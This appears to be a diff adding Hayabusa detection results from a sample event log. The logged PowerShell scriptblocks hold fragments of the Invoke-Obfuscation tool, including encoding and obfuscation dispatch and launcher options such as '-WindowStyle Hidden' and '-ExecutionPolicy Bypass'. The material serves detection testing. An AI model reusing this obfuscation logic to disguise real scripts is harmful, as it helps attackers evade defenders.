+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. $Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. $Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . ((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye 